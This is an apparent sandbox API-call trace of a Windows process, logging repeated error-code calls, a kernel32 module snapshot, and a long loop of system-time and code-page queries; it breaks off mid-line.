SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.206] SetLastError (dwErrCode=0x0) [0172.206] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.207] SetLastError (dwErrCode=0x0) [0172.207] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.208] SetLastError (dwErrCode=0x0) [0172.208] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] SetLastError (dwErrCode=0x0) [0172.209] GetLastError () returned 0x0 [0172.209] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0172.210] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0172.210] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0172.210] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0172.213] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0172.213] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0172.214] GetTickCount () returned 0x115a574 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.214] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.214] GetACP () returned 0x4e4 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.214] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.214] GetACP () returned 0x4e4 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.214] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.214] GetACP () returned 0x4e4 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.214] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.214] GetACP () returned 0x4e4 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.214] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.214] GetACP () returned 0x4e4 [0172.214] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.215] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.215] GetACP () returned 0x4e4 [0172.215] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.216] GetACP () returned 0x4e4 [0172.216] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.216] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.217] GetACP () returned 0x4e4 [0172.217] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.217] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.218] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.218] GetACP () returned 0x4e4 [0172.218] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.219] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.219] GetACP () returned 0x4e4 [0172.219] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.220] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.220] GetACP () returned 0x4e4 [0172.220] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.221] GetACP () returned 0x4e4 [0172.221] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.221] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0172.222] GetACP () returned 0x4e4 [0172.222] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0172.222] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: 